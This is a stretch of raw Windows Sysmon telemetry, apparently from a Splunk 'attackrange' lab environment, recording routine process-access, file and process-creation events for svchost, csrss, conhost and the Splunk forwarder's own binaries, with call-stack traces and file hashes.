Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4BB7544B55AE66362AD862F764820EF,SHA256=CF458DC754BFD1A5B409A57B17DBD55C2DE1BC557B594CA968CBCD8B2F04DD93,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918760Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:52:00.767{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918759Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:52:00.767{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918758Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:52:00.056{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D58F6A907CA93BAE419DC32713506519,SHA256=82F72E6FE6EE2A4C526E982147C8793A33843046CE68C077F27B9536B9A6BE77,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918763Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:52:01.768{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918762Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:52:01.768{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918761Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:52:01.081{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1C3CB971C838FE1CDA4F2CFD5433CD3,SHA256=76CC7AC5D35CE34132409754FDE91BAB9C47570054521720B2E7742E9CF2D133,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000638926Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:52:01.802{BFB545BB-B8FB-6058-A600-00000000AF01}8083700C:\Windows\system32\conhost.exe{BFB545BB-B481-605B-3A5A-00000000AF01}2724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638925Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:52:01.802{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638924Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:52:01.802{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638923Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:52:01.802{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638922Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:52:01.802{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638921Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:52:01.802{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638920Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:52:01.802{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638919Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:52:01.802{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638918Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:52:01.802{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638917Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:52:01.802{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638916Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:52:01.802{BFB545BB-B864-6058-0500-00000000AF01}628644C:\Windows\system32\csrss.exe{BFB545BB-B481-605B-3A5A-00000000AF01}2724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000638915Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:52:01.802{BFB545BB-B8FB-6058-A200-00000000AF01}36401220C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BFB545BB-B481-605B-3A5A-00000000AF01}2724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000638914Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:52:01.803{BFB545BB-B481-605B-3A5A-00000000AF01}2724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BFB545BB-B865-6058-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service